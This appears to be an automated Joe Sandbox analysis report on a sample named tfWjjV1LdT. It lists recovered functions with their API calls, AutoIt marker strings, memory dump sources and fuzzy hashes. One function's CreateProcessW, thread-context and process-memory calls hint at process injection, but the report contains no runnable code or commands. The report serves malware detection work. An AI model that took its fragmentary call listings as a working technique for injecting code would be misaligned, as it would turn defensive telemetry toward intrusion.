Function 006935B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,006935A1,SwapMouseButtons,00000004,?), ref: 006935D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,006935A1,SwapMouseButtons,00000004,?,?,?,?,00692754), ref: 006935F5
RegCloseKey.KERNELBASE(00000000,?,?,006935A1,SwapMouseButtons,00000004,?,?,?,?,00692754), ref: 00693617

Strings

Control Panel\Mouse, xrefs: 006935D2

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: b97db846e38984d027dcc9d5878e6b6607c873aff4fc1992a414b0bbdc62124a
Instruction ID: 7e2d03841b87b6489c10059bfecf89c072ae1e976fc4dfe47cb995d87cb2a50a
Opcode Fuzzy Hash: b97db846e38984d027dcc9d5878e6b6607c873aff4fc1992a414b0bbdc62124a
Instruction Fuzzy Hash: 89113371610228BADF208FA8DC80AEABBAEEF04740F008469E805D7310E2719E419BA4

Function 00D51EC0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00D5267B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00D52711
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00D52733

Memory Dump Source

Source File: 00000000.00000002.2087821724.0000000000D50000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_tfWjjV1LdT.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
Instruction ID: 9a46ae35e6eec0cc520512671491a2be784e19dc5cafc75aa64e6463f4cbd6a3
Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
Instruction Fuzzy Hash: AC620C30A142589BEB24CFA4C850BEEB372EF58301F1091A9D50DEB394E7759E85CF69

Function 006F955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00694EE5: _fseek.LIBCMT ref: 00694EFD

Part of subcall function 006F9734: _wcscmp.LIBCMT ref: 006F9824
Part of subcall function 006F9734: _wcscmp.LIBCMT ref: 006F9837

_free.LIBCMT ref: 006F96A2
_free.LIBCMT ref: 006F96A9
_free.LIBCMT ref: 006F9714

Part of subcall function 006B2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,006B9A24), ref: 006B2D69
Part of subcall function 006B2D55: GetLastError.KERNEL32(00000000,?,006B9A24), ref: 006B2D7B

_free.LIBCMT ref: 006F971C

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 57d0d2f04a8deae04fb8388104c663c78e861137db03f429770e89b5c3a69279
Instruction ID: c95ff51ad248cb345dc928551b2bf3429735d4d63c84fddadf51a4ee3dc26203
Opcode Fuzzy Hash: 57d0d2f04a8deae04fb8388104c663c78e861137db03f429770e89b5c3a69279
Instruction Fuzzy Hash: D3515FB1D14219AFDF649F64CC81AEEBBBAEF48300F10049EF209A7241DB715A81CF58

Function 006B470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 006B47A0
__flush.LIBCMT ref: 006B47C0
__write.LIBCMT ref: 006B47F3
__flsbuf.LIBCMT ref: 006B4821

Part of subcall function 006B8B28: __getptd_noexit.LIBCMT ref: 006B8B28

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction ID: 188a15ad8b8c3ed6e083c9ecd6b74648a89b1a06ea9c234917ba4c98195f9e24
Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction Fuzzy Hash: 1741C2B4A007459BDB28CEA9C8809EE7BA7EF46360B24817DE85587742EF70DDC1CB40

Function 006944A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006944CF

Part of subcall function 0069407C: _memset.LIBCMT ref: 006940FC
Part of subcall function 0069407C: _wcscpy.LIBCMT ref: 00694150
Part of subcall function 0069407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00694160

KillTimer.USER32(?,00000001,?,?), ref: 00694524
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00694533
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 006CD4B9

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 70dbfe4892d1415d6be30b5f5d95f234bc26662e243d5fc0ab6a4f2eae9c1e6e
Instruction ID: 0e7563e841e8a33738100364edf83bc70f2ed2845dd03ecd8c402fab5dfe4ad9
Opcode Fuzzy Hash: 70dbfe4892d1415d6be30b5f5d95f234bc26662e243d5fc0ab6a4f2eae9c1e6e
Instruction Fuzzy Hash: 0421F5B0504784AFEB328B648855FF6BBEDEF01304F0480ADE78E97281C7742A85CB45

Function 00694C70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00694CBA

Strings

AU3!P/r, xrefs: 00694CB4
EA06, xrefs: 006CD8CC

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: _memmove
String ID: AU3!P/r$EA06
API String ID: 4104443479-480415842
Opcode ID: 731f4702ff21bf22311ab7aba52423fcc95b41db1587cd44ddd3681a971baec9
Instruction ID: 5fbc93cb844c26095abe8ceb48f88df44f843ba4e6b5394291718a4bf6942ea2
Opcode Fuzzy Hash: 731f4702ff21bf22311ab7aba52423fcc95b41db1587cd44ddd3681a971baec9
Instruction Fuzzy Hash: 4F417D25A041585BDF259B648891FFE7FAFDF45300F284579EC829BB82DE209D4B83A1

Function 00697285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006CEA39
GetOpenFileNameW.COMDLG32(?), ref: 006CEA83

Part of subcall function 00694750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00694743,?,?,006937AE,?), ref: 00694770

Part of subcall function 006B0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006B07B0

Strings

X, xrefs: 006CEA51

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: d5a280758a82d665b72524b8e4855d26cda02c64976ad9e8474a04c41c82d421
Instruction ID: e6522267ab1a4af540796cd1932bf0f7dee27b09957759ece65c9549b4b4f228
Opcode Fuzzy Hash: d5a280758a82d665b72524b8e4855d26cda02c64976ad9e8474a04c41c82d421
Instruction Fuzzy Hash: B9218471A102489BDF819F94C845BEE7BFEAF49714F04405AE408AB241DBB859898FA5

Function 006F98E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 006F98F8
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 006F990F

Strings

aut, xrefs: 006F9909

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 1d695a57a47ede976b19c7dc012035fde38b5c92c139cb35f8806b580392100b
Instruction ID: 56ebd0469d3cb0284bebd5e79010194f6a3c90309e6aa122545dbd1b2de5812a
Opcode Fuzzy Hash: 1d695a57a47ede976b19c7dc012035fde38b5c92c139cb35f8806b580392100b
Instruction Fuzzy Hash: CCD05E7954030DABDB50ABA4DC0EFDE777CE704700F0082B1FA54920E1EAB895988B95

Function 0070CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 851e2826e882f0415f31c1bfe4067c987b1bb90095d27daa99cae1911a1feda8
Instruction ID: bc3427c0d0fb362b19c2dc102c073fea125e4bd6338f8d5205fb4b2c51cdd931
Opcode Fuzzy Hash: 851e2826e882f0415f31c1bfe4067c987b1bb90095d27daa99cae1911a1feda8
Instruction Fuzzy Hash: 54F14A71608301DFCB14DF28C584A6ABBE5FF88314F148A2EF8999B291D734E945CF82

Function 0069434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00694370
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00694415
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00694432

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: f9155765d12cf78d6d6d2db32d5e641d6f0eef8f6f7962121335f99ad7ebd81e
Instruction ID: d72b6b908b4a086442cc7a35f928dc05167a3d60a037fd2e5414206fc2d33ad8
Opcode Fuzzy Hash: f9155765d12cf78d6d6d2db32d5e641d6f0eef8f6f7962121335f99ad7ebd81e
Instruction Fuzzy Hash: EA31C1B05057019FDB20DF34D884ADBBBF9FB48309F00492EE68AC2751EBB4A945CB56

Function 006B571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 006B5733

Part of subcall function 006BA16B: __NMSG_WRITE.LIBCMT ref: 006BA192
Part of subcall function 006BA16B: __NMSG_WRITE.LIBCMT ref: 006BA19C

__NMSG_WRITE.LIBCMT ref: 006B573A

Part of subcall function 006BA1C8: GetModuleFileNameW.KERNEL32(00000000,007533BA,00000104,?,00000001,00000000), ref: 006BA25A
Part of subcall function 006BA1C8: ___crtMessageBoxW.LIBCMT ref: 006BA308

Part of subcall function 006B309F: ___crtCorExitProcess.LIBCMT ref: 006B30A5
Part of subcall function 006B309F: ExitProcess.KERNEL32 ref: 006B30AE

Part of subcall function 006B8B28: __getptd_noexit.LIBCMT ref: 006B8B28

RtlAllocateHeap.NTDLL(00D10000,00000000,00000001,00000000,?,?,?,006B0DD3,?), ref: 006B575F

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 651f558640166c46ce6a6dd14e4b099b371cb1433c51ac497f3d5411854cf3b8
Instruction ID: c3960a85746c521ef34139fbf7bde5826c8b1f4e8a361c3e8171438f67a1eb1d
Opcode Fuzzy Hash: 651f558640166c46ce6a6dd14e4b099b371cb1433c51ac497f3d5411854cf3b8
Instruction Fuzzy Hash: 8B01D2F5300B11EED6902B79AC42BEE778A9B42362F100539F5069B292DEB49CC18769

Function 006F98A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,006F9548,?,?,?,?,?,00000004), ref: 006F98BB
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,006F9548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 006F98D1
CloseHandle.KERNEL32(00000000,?,006F9548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 006F98D8

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: b4bde4490bbbc83d3af6bdfea77683cfe3052898e610f8cb928ef8f3de8501ed
Instruction ID: 6b6ab230f6f1efa6d53e62f0007ab9984f0d4a4b863aea02c51bfbe2719433ae
Opcode Fuzzy Hash: b4bde4490bbbc83d3af6bdfea77683cfe3052898e610f8cb928ef8f3de8501ed
Instruction Fuzzy Hash: B8E08632180618B7D7211B58EC09FDA7F29AB06760F10C221FB24691E0C7B55511979C

Function 0069A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 006CFC01

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 7115cad8cea6c4c5a275da79a471f0c907e749033553b5ce371a576205d17b31
Instruction ID: 39827467d99e702b08d959b43db3492c3837c8868dbf2323a66fa325df795e84
Opcode Fuzzy Hash: 7115cad8cea6c4c5a275da79a471f0c907e749033553b5ce371a576205d17b31
Instruction Fuzzy Hash: B9225570608241DFDB64DF54C490AAABBE6FF84304F15896DE88A8B762D731EC45CB86

Function 006F77B3 Relevance: 3.1, APIs: 2, Instructions: 133COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 006F78DB

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 33ee2adab76b61eaad11b048421302318a8f1e1106a9e19eb2b4e9a6ccc829cf
Instruction ID: 1514089513fabb7e63418092ab8834c66131478991e48244a84ddb87b3f4ef1b
Opcode Fuzzy Hash: 33ee2adab76b61eaad11b048421302318a8f1e1106a9e19eb2b4e9a6ccc829cf
Instruction Fuzzy Hash: 2241F37190820D9FDB50EFA8D8859FABBABEF09340B24456DE29597382DB74EC01C764

Function 00697A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00697AAB
_memmove.LIBCMT ref: 00697B16

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 8a1fad2dc96cfc5bda97f6ddc727d0ae725561dd87fd932f273e0287656629b4
Instruction ID: caa6486210b0d8f206d1e634dbd2a0b65927fc9ccba55774fb55dbdc49d9f7c9
Opcode Fuzzy Hash: 8a1fad2dc96cfc5bda97f6ddc727d0ae725561dd87fd932f273e0287656629b4
Instruction Fuzzy Hash: 1D31C4B1714606AFCB04DF68C8D1EA9B3AAFF48320714862DE419CB791EB30E951CB90

Function 006947D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00694834

Part of subcall function 006B336C: __lock.LIBCMT ref: 006B3372
Part of subcall function 006B336C: DecodePointer.KERNEL32(00000001,?,00694849,006E7C74), ref: 006B337E
Part of subcall function 006B336C: EncodePointer.KERNEL32(?,?,00694849,006E7C74), ref: 006B3389

Part of subcall function 006948FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00694915
Part of subcall function 006948FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0069492A

Part of subcall function 00693B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00693B68
Part of subcall function 00693B3A: IsDebuggerPresent.KERNEL32 ref: 00693B7A
Part of subcall function 00693B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,007552F8,007552E0,?,?), ref: 00693BEB
Part of subcall function 00693B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00693C6F

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00694874

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: 56a350be4fda7ebf224d4238b97485256c1da61318cd464c04aebf9898f5225a
Instruction ID: 2fbcf9927f45a77e188258380af3d7735e5f6d763810fbc6ffa28aff3bc9745c
Opcode Fuzzy Hash: 56a350be4fda7ebf224d4238b97485256c1da61318cd464c04aebf9898f5225a
Instruction Fuzzy Hash: B911AFB19183519FCB00EF29D90598EBFE9FF88750F10891EF044832B1DBB59645CB9A

Function 006B0DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 006B571C: __FF_MSGBANNER.LIBCMT ref: 006B5733
Part of subcall function 006B571C: __NMSG_WRITE.LIBCMT ref: 006B573A
Part of subcall function 006B571C: RtlAllocateHeap.NTDLL(00D10000,00000000,00000001,00000000,?,?,?,006B0DD3,?), ref: 006B575F

std::exception::exception.LIBCMT ref: 006B0DEC
__CxxThrowException@8.LIBCMT ref: 006B0E01

Part of subcall function 006B859B: RaiseException.KERNEL32(?,?,?,00749E78,00000000,?,?,?,?,006B0E06,?,00749E78,?,00000001), ref: 006B85F0

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 6dc530b375af3ad20da21429f4a5bd1d3d3f973c12e37df47cd7809056ea7f2d
Instruction ID: c55898a28deb6bd780b1dc05a2b9925c21b6bdef829508ff0e57457fc48c2c0b
Opcode Fuzzy Hash: 6dc530b375af3ad20da21429f4a5bd1d3d3f973c12e37df47cd7809056ea7f2d
Instruction Fuzzy Hash: 31F0A4B164022E7ADB10AA94EC059DF7BAE9F01351F50046DF90497282DF70DAC1C7D5

Function 006B53A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 006B8B28: __getptd_noexit.LIBCMT ref: 006B8B28

__lock_file.LIBCMT ref: 006B53EB

Part of subcall function 006B6C11: __lock.LIBCMT ref: 006B6C34

__fclose_nolock.LIBCMT ref: 006B53F6

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

